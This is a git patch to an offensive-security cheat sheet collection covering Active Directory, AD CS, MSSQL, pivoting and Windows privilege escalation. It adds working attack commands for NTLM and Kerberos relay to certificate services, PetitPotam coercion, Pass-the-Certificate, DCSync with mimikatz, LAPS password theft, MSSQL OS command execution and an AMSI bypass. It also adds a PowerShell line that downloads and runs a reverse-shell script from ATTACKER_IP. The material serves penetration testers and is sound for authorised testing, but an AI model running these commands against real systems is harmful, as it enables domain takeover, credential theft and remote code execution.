From 3066615cde55f9cd6755ed81a7d83c229f78e397 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Tue, 31 May 2022 11:57:44 +0200 Subject: [PATCH] LAPS Access + Pass the Cert + Writeable folder --- .../Active Directory Attack.md | 164 +++++++++++------- .../Cloud - Azure Pentest.md | 14 +- Methodology and Resources/Escape Breakout.md | 1 + .../MSSQL Server - Cheatsheet.md | 30 +++- .../Network Pivoting Techniques.md | 12 +- .../Windows - Privilege Escalation.md | 45 +++-- 6 files changed, 186 insertions(+), 80 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 6d904ec9..79fe4360 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -82,6 +82,7 @@ - [ESC7 - Vulnerable Certificate Authority Access Control](#esc7---vulnerable-certificate-authority-access-control) - [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack) - [Certifried CVE-2022-26923](#certifried-cve-2022-26923) + - [Pass-The-Certificate](#pass-the-certificate) - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) - [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces) - [GenericAll](#genericall) @@ -230,13 +231,13 @@ Use the correct collector # run the collector on the machine using SharpHound.exe # https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe # /usr/lib/bloodhound/resources/app/Collectors/SharpHound.exe - .\SharpHound.exe -c all -d active.htb -SearchForest - .\SharpHound.exe --EncryptZip --ZipFilename export.zip - .\SharpHound.exe -c all,GPOLocalGroup + .\SharpHound.exe -c all -d active.htb --searchforest + .\SharpHound.exe -c all,GPOLocalGroup # all collection doesn't include GPOLocalGroup by default + .\SharpHound.exe --CollectionMethod DCOnly # only collect from the DC, doesn't query the computers (more stealthy) + .\SharpHound.exe -c all --LdapUsername --LdapPassword --JSONFolder - .\SharpHound.exe -c all -d active.htb --LdapUsername --LdapPassword --domaincontroller 10.10.10.100 + .\SharpHound.exe -c all --LdapUsername --LdapPassword --domaincontroller 10.10.10.100 -d active.htb .\SharpHound.exe -c all,GPOLocalGroup --outputdirectory C:\Windows\Temp --randomizefilenames --prettyjson --nosavecache --encryptzip --collectallproperties --throttle 10000 --jitter 23 - .\SharpHound.exe -c all,GPOLocalGroup --searchforest # or run the collector on the machine using Powershell # https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1 @@ -1466,7 +1467,15 @@ Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll' ```bash ldapsearch -x -h  -D "@" -w  -b "dc=<>,dc=<>,dc=<>" "(&(objectCategory=computer)(ms-MCS-AdmPwd=*))" ms-MCS-AdmPwd` ``` - + +#### Grant LAPS Access +The members of the group **"Account Operator"** can add and modify all the non admin users and groups. Since **LAPS ADM** and **LAPS READ** are considered as non admin groups, it's possible to add an user to them, and read the LAPS admin password + +```ps1 +Add-DomainGroupMember -Identity 'LAPS ADM' -Members 'user1' -Credential $cred -Domain "domain.local" +Add-DomainGroupMember -Identity 'LAPS READ' -Members 'user1' -Credential $cred -Domain "domain.local" +``` + ### Reading GMSA Password @@ -2230,7 +2239,9 @@ secretsdump.py -k -no-pass target.lab.local ### Active Directory Certificate Services -* Find ADCS Server : `crackmapexec ldap domain.lab -u username -p password -M adcs` +* Find ADCS Server + * `crackmapexec ldap domain.lab -u username -p password -M adcs` + * `ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=,OU=Users,DC=domain,DC=local' -w '' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName` * Enumerate AD Enterprise CAs with certutil: `certutil.exe -config - -ping` #### ESC1 - Misconfigured Certificate Templates @@ -2247,8 +2258,10 @@ Exploitation: ```ps1 Certify.exe find /vulnerable Certify.exe find /vulnerable /currentuser - or + # or PS> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=lab,DC=local' + # or + certipy 'domain.local'/'user':'password'@'domaincontroller' find -bloodhound ``` * Use Certify, [Certi](https://github.com/eloypgz/certi) or [Certipy](https://github.com/ly4k/Certipy) to request a Certificate and add an alternative name (user to impersonate) ```ps1 @@ -2394,64 +2407,75 @@ Certify.exe writefile /ca:SERVER\ca-name /path:\\remote.server\share\shell.php / Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101) -* Version 1: NTLM Relay + Rubeus + PetitPotam - ```powershell - impacket> python3 ntlmrelayx.py -t http:///certsrv/certfnsh.asp -smb2support --adcs - impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template VulnTemplate - # For a member server or workstation, the template would be "Computer". - # Other templates: workstation, DomainController, Machine, KerberosAuthentication +* **Version 1**: NTLM Relay + Rubeus + PetitPotam + ```powershell + impacket> python3 ntlmrelayx.py -t http:///certsrv/certfnsh.asp -smb2support --adcs + impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template VulnTemplate + # For a member server or workstation, the template would be "Computer". + # Other templates: workstation, DomainController, Machine, KerberosAuthentication - # Coerce the authentication via MS-ESFRPC EfsRpcOpenFileRaw function with petitpotam - # You can also use any other way to coerce the authentication like PrintSpooler via MS-RPRN - git clone https://github.com/topotam/PetitPotam - python3 petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP - python3 petitpotam.py -d '' -u '' -p '' $ATTACKER_IP $TARGET_IP - python3 dementor.py -u -p -d - python3 dementor.py 10.10.10.250 10.10.10.10 -u user1 -p Password1 -d lab.local + # Coerce the authentication via MS-ESFRPC EfsRpcOpenFileRaw function with petitpotam + # You can also use any other way to coerce the authentication like PrintSpooler via MS-RPRN + git clone https://github.com/topotam/PetitPotam + python3 petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP + python3 petitpotam.py -d '' -u '' -p '' $ATTACKER_IP $TARGET_IP + python3 dementor.py -u -p -d + python3 dementor.py 10.10.10.250 10.10.10.10 -u user1 -p Password1 -d lab.local - # Use the certificate with rubeus to request a TGT - Rubeus.exe asktgt /user: /certificate: /ptt - Rubeus.exe asktgt /user:dc1$ /certificate:MIIRdQIBAzC...mUUXS /ptt + # Use the certificate with rubeus to request a TGT + Rubeus.exe asktgt /user: /certificate: /ptt + Rubeus.exe asktgt /user:dc1$ /certificate:MIIRdQIBAzC...mUUXS /ptt - # Now you can use the TGT to perform a DCSync - mimikatz> lsadump::dcsync /user:krbtgt - ``` + # Now you can use the TGT to perform a DCSync + mimikatz> lsadump::dcsync /user:krbtgt + ``` -* Version 2: NTLM Relay + Mimikatz + Kekeo - ```powershell - impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template DomainController +* **Version 2**: NTLM Relay + Mimikatz + Kekeo + ```powershell + impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template DomainController - # Mimikatz - mimikatz> misc::efs /server:dc.lab.local /connect: /noauth + # Mimikatz + mimikatz> misc::efs /server:dc.lab.local /connect: /noauth - # Kekeo - kekeo> base64 /input:on - kekeo> tgt::ask /pfx: /user:dc$ /domain:lab.local /ptt + # Kekeo + kekeo> base64 /input:on + kekeo> tgt::ask /pfx: /user:dc$ /domain:lab.local /ptt - # Mimikatz - mimikatz> lsadump::dcsync /user:krbtgt - ``` -* Version 3: ADCSPwn - Require `WebClient` service running on the domain controller. By default this service is not installed. - ```powershell - https://github.com/bats3c/ADCSPwn - adcspwn.exe --adcs --port [local port] --remote [computer] - adcspwn.exe --adcs cs.pwnlab.local - adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001 - adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txt - adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.local + # Mimikatz + mimikatz> lsadump::dcsync /user:krbtgt + ``` - # ADCSPwn arguments - adcs - This is the address of the AD CS server which authentication will be relayed to. - secure - Use HTTPS with the certificate service. - port - The port ADCSPwn will listen on. - remote - Remote machine to trigger authentication from. - username - Username for non-domain context. - password - Password for non-domain context. - dc - Domain controller to query for Certificate Templates (LDAP). - unc - Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) . - output - Output path to store base64 generated crt. - ``` -* Version 4: Certipy ESC8 +* **Version 3**: Kerberos Relay + ```ps1 + # Setup the relay + sudo krbrelayx.py --target http://CA/certsrv -ip attacker_IP --victim target.domain.local --adcs --template Machine + + # Run mitm6 + sudo mitm6 --domain domain.local --host-allowlist target.domain.local --relay CA.domain.local -v + ``` + +* **Version 4**: ADCSPwn - Require `WebClient` service running on the domain controller. By default this service is not installed. + ```powershell + https://github.com/bats3c/ADCSPwn + adcspwn.exe --adcs --port [local port] --remote [computer] + adcspwn.exe --adcs cs.pwnlab.local + adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001 + adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txt + adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.local + + # ADCSPwn arguments + adcs - This is the address of the AD CS server which authentication will be relayed to. + secure - Use HTTPS with the certificate service. + port - The port ADCSPwn will listen on. + remote - Remote machine to trigger authentication from. + username - Username for non-domain context. + password - Password for non-domain context. + dc - Domain controller to query for Certificate Templates (LDAP). + unc - Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) . + output - Output path to store base64 generated crt. + ``` + +* **Version 5**: Certipy ESC8 ```ps1 certipy relay -ca 172.16.19.100 ``` @@ -2496,6 +2520,29 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101 ``` +#### Pass-The-Certificate + +* Windows + ```ps1 + # Information about a cert file + certutil -v -dump admin.pfx + + # From a Base64 PFX + Rubeus.exe asktgt /user:"TARGET_SAMNAME" /certificate:cert.pfx /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show + ``` +* Linux + ```ps1 + # Base64-encoded PFX certificate (string) (password can be set) + gettgtpkinit.py -pfx-base64 $(cat "PATH_TO_B64_PFX_CERT") "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE" + ​ + # PEM certificate (file) + PEM private key (file) + gettgtpkinit.py -cert-pem "PATH_TO_PEM_CERT" -key-pem "PATH_TO_PEM_KEY" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE" + + # PFX certificate (file) + password (string, optionnal) + gettgtpkinit.py -cert-pfx "PATH_TO_PFX_CERT" -pfx-pass "CERT_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE" + ``` + + ### Dangerous Built-in Groups Usage If you do not want modified ACLs to be overwritten every hour, you should change ACL template on the object `CN=AdminSDHolder,CN=System` or set `"dminCount` attribute to `0` for the required object. @@ -2516,6 +2563,7 @@ Get-ADGroup -LDAPFilter "(objectcategory=group) (admincount=1)" ([adsisearcher]"(AdminCount=1)").findall() ``` + #### AdminSDHolder Abuse > The Access Control List (ACL) of the AdminSDHolder object is used as a template to copy permissions to all "protected groups" in Active Directory and their members. Protected groups include privileged groups such as Domain Admins, Administrators, Enterprise Admins, and Schema Admins. diff --git a/Methodology and Resources/Cloud - Azure Pentest.md b/Methodology and Resources/Cloud - Azure Pentest.md index 65dc4d77..54e598dc 100644 --- a/Methodology and Resources/Cloud - Azure Pentest.md +++ b/Methodology and Resources/Cloud - Azure Pentest.md @@ -3,6 +3,7 @@ ## Summary * [Azure Recon Tools](#azure-recon-tools) +* [Terminology](#terminology) * [Enumeration](#enumeration) * [Enumerate valid emails](#enumerate-valid-emails) * [Enumerate Azure Subdomains](#enumerate-azure-subdomains) @@ -179,7 +180,17 @@ # Administrator $ Create-Backdoor, Execute-Backdoor ``` + +## Terminology + +> Basic Azure AD terminologies + +* **Tenant**: An instance of Azure AD and represents a single organization. +* **Azure AD Directory**: Each tenant has a dedicated Directory. This is used to perform identity and access management functions for resources. +* **Subscriptions**: It is used to pay for services. There can be multiple subscriptions in a Directory. +* **Core Domain**: The initial domain name .onmicrosoft.com is the core domain. It is possible to define custom domain names too. + ## Enumeration ### Enumerate valid emails @@ -1115,4 +1126,5 @@ Using [https://autologon.microsoftazuread-sso.com/](https://autologon.microsofta * [Moving laterally between Azure AD joined machines - Tal Maor - Mar 17, 2020](https://medium.com/@talthemaor/moving-laterally-between-azure-ad-joined-machines-ed1f8871da56) * [AZURE AD INTRODUCTION FOR RED TEAMERS - Written by Aymeric Palhière (bak) - 2020-04-20](https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html) * [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/) -* [The Art of the Device Code Phish - Bobby Cooke](https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html) \ No newline at end of file +* [The Art of the Device Code Phish - Bobby Cooke](https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html) +* [AZURE AD cheatsheet - BlackWasp](https://hideandsec.sh/books/cheatsheets-82c/page/azure-ad) \ No newline at end of file diff --git a/Methodology and Resources/Escape Breakout.md b/Methodology and Resources/Escape Breakout.md index 5604fc82..b66a7378 100644 --- a/Methodology and Resources/Escape Breakout.md +++ b/Methodology and Resources/Escape Breakout.md @@ -146,3 +146,4 @@ firefox irc://127.0.0.1 -P "Test" * [PentestPartners - Breaking out of Citrix and other restricted desktop environments](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/) * [Breaking Out! of Applications Deployed via Terminal Services, Citrix, and Kiosks - Scott Sutherland - May 22nd, 2013](https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/) * [Escaping from KIOSKs - HackTricks](https://book.hacktricks.xyz/physical-attacks/escaping-from-gui-applications) +* [Breaking out of Windows Kiosks using only Microsoft Edge - Firat Acar - May 24, 2022](https://blog.nviso.eu/2022/05/24/breaking-out-of-windows-kiosks-using-only-microsoft-edge/) \ No newline at end of file diff --git a/Methodology and Resources/MSSQL Server - Cheatsheet.md b/Methodology and Resources/MSSQL Server - Cheatsheet.md index 860d5b0f..2a5744d6 100644 --- a/Methodology and Resources/MSSQL Server - Cheatsheet.md +++ b/Methodology and Resources/MSSQL Server - Cheatsheet.md @@ -163,12 +163,14 @@ A Valid Link Will Be Identified by the DatabaseLinkName Field in the Results ```ps1 Get-SQLInstanceDomain | Get-SQLServerLink -Verbose +select * from master..sysservers ``` ### Crawl Links for a Specific Instance ```ps1 Get-SQLServerLinkCrawl -Instance "" -Verbose +select * from openquery("",'select * from openquery("",''select * from master..sysservers'')') ``` ### Query Version of Linked Database @@ -286,12 +288,21 @@ Prerequisites: * CREATE ASSEMBLY permission (or) * ALTER ASSEMBLY permission (or) +The execution takes place with privileges of the **service account**. + ### Execute commands using CLR assembly ```ps1 +# Create C# code for the DLL, the DLL and SQL query with DLL as hexadecimal string +Create-SQLFileCLRDll -ProcedureName "runcmd" -OutFile runcmd -OutDir C:\Users\user\Desktop + +# Execute command using CLR assembly +Invoke-SQLOSCmdCLR -Username sa -Password -Instance -Command "whoami" -Verbose Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "" -Command "whoami" Verbose -or Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "" -Command "powershell -e " -Verbose + +# List all the stored procedures added using CLR +Get-SQLStoredProcedureCLR -Instance -Verbose ``` ### Manually creating a CLR DLL and importing it @@ -385,6 +396,7 @@ GO ## OLE Automation * :warning: Disabled by default +* The execution takes place with privileges of the **service account**. ### Execute commands using OLE automation procedures @@ -418,6 +430,9 @@ SQL> upload reciclador.dll C:\windows\temp\reciclador.dll ## Agent Jobs +* The execution takes place with privileges of the **SQL Server Agent service account** if a proxy account is not configured. +* :warning: Require **sysadmin** or **SQLAgentUserRole**, **SQLAgentReaderRole**, and **SQLAgentOperatorRole** roles to create a job. + ### Execute commands through SQL Agent Job service ```ps1 @@ -461,12 +476,21 @@ RECONFIGURE; ```ps1 Invoke-SQLOSCmdPython -Username sa -Password Password1234 -Instance "" -Command "powershell -e " -Verbose + +EXEC sp_execute_external_script @language =N'Python',@script=N'import subprocess p = subprocess.Popen("cmd.exe /c whoami", stdout=subprocess.PIPE) OutputDataSet = pandas.DataFrame([str(p.stdout.read(), "utf-8")])' +WITH RESULT SETS (([cmd_out] nvarchar(max))) ``` ## R ```ps1 Invoke-SQLOSCmdR -Username sa -Password Password1234 -Instance "" -Command "powershell -e " -Verbose + +EXEC sp_execute_external_script @language=N'R',@script=N'OutputDataSet <- data.frame(system("cmd.exe /c dir",intern=T))' +WITH RESULT SETS (([cmd_out] text)); +GO + +@script=N'OutputDataSet <-data.frame(shell("dir",intern=T))' ``` ## Audit Checks @@ -491,8 +515,10 @@ powerpick Get-SQLQuery -Instance "" -Query "EXECUTE AS ## Find databases that have been configured as trustworthy -```ps1 +```sql Invoke-SQLAuditPrivTrustworthy -Instance "" -Exploit -Verbose + +SELECT name as database_name, SUSER_NAME(owner_sid) AS database_owner, is_trustworthy_on AS TRUSTWORTHY from sys.databases ``` > The following audit checks run web requests to load Inveigh via reflection. Be mindful of the environment and ability to connect outbound. diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index 39e40aa5..e65d3a21 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -30,8 +30,17 @@ ```powershell netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport - netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110 + +# Forward the port 4545 for the reverse shell, and the 80 for the http server for example +netsh interface portproxy add v4tov4 listenport=4545 connectaddress=192.168.50.44 connectport=4545 +netsh interface portproxy add v4tov4 listenport=80 connectaddress=192.168.50.44 connectport=80 +# Correctly open the port on the machine +netsh advfirewall firewall add rule name="PortForwarding 80" dir=in action=allow protocol=TCP localport=80 +netsh advfirewall firewall add rule name="PortForwarding 80" dir=out action=allow protocol=TCP localport=80 +netsh advfirewall firewall add rule name="PortForwarding 4545" dir=in action=allow protocol=TCP localport=4545 +netsh advfirewall firewall add rule name="PortForwarding 4545" dir=out action=allow protocol=TCP localport=4545 + ``` 1. listenaddress – is a local IP address waiting for a connection. @@ -446,3 +455,4 @@ tar xvzf cloudflared-stable-linux-amd64.tgz * [Pivoting Meterpreter](https://www.information-security.fr/pivoting-meterpreter/) * [Etat de l’art du pivoting réseau en 2019 - Oct 28,2019 - Alexandre Zanni](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/) * [Red Team: Using SharpChisel to exfil internal network - Shantanu Khandelwal - Jun 8](https://medium.com/@shantanukhande/red-team-using-sharpchisel-to-exfil-internal-network-e1b07ed9b49) +* [Active Directory - hideandsec](https://hideandsec.sh/books/cheatsheets-82c/page/active-directory) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index ffcc86bd..bbf93c75 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -315,15 +315,15 @@ netsh Advfirewall set allprofiles state off ### AppLocker Enumeration - With the GPO -- HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2 (Keys: Appx, Dll, Exe, Msi and Script). - +- `HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2` (Keys: Appx, Dll, Exe, Msi and Script). * List AppLocker rules ```powershell PowerView PS C:\> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections ``` -* Applocker Bypass +* AppLocker Bypass + * By default, `C:\Windows` is not blocked, and `C:\Windows\Tasks` is writtable by any users * https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md * https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.md * https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md @@ -337,23 +337,20 @@ C:\windows\syswow64\windowspowershell\v1.0\powershell C:\Windows\System32\WindowsPowerShell\v1.0\powershell ``` -Powershell Constrained Mode +#### Powershell Constrained Mode -```powershell -# Check if we are in a constrained mode -$ExecutionContext.SessionState.LanguageMode +* Check if we are in a constrained mode: `$ExecutionContext.SessionState.LanguageMode` +* [bypass-clm - PowerShell Constrained Language Mode Bypass](https://github.com/calebstewart/bypass-clm) +* [PowerShdll - Powershell with no Powershell.exe via DLL's](https://github.com/p3nt4/PowerShdll): `rundll32.exe C:\temp\PowerShdll.dll,main` +* Other bypasses + ```powershell + PS > &{ whoami } + powershell.exe -v 2 -ep bypass -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')" + ``` -PS > &{ whoami } -powershell.exe -v 2 -ep bypass -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')" +#### AMSI Bypass -# PowerShDLL - Powershell with no Powershell.exe via DLL’s -# https://github.com/p3nt4/PowerShdll -ftp> rundll32.exe C:\temp\PowerShdll.dll,main -``` - - - -Example of AMSI Bypass. +Find more AMSI bypass: [here](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass.md) ```powershell PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true) @@ -365,10 +362,22 @@ PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetF ```powershell C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys C:\Windows\System32\spool\drivers\color -C:\Windows\Tasks +C:\Windows\System32\spool\printers +C:\Windows\System32\spool\servers C:\Windows\tracing C:\Windows\Temp C:\Users\Public +C:\Windows\Tasks +C:\Windows\System32\tasks +C:\Windows\SysWOW64\tasks +C:\Windows\System32\tasks_migrated\microsoft\windows\pls\system +C:\Windows\SysWOW64\tasks\microsoft\windows\pls\system +C:\Windows\debug\wia +C:\Windows\registration\crmlog +C:\Windows\System32\com\dmp +C:\Windows\SysWOW64\com\dmp +C:\Windows\System32\fxstmp +C:\Windows\SysWOW64\fxstmp ``` ## EoP - Looting for passwords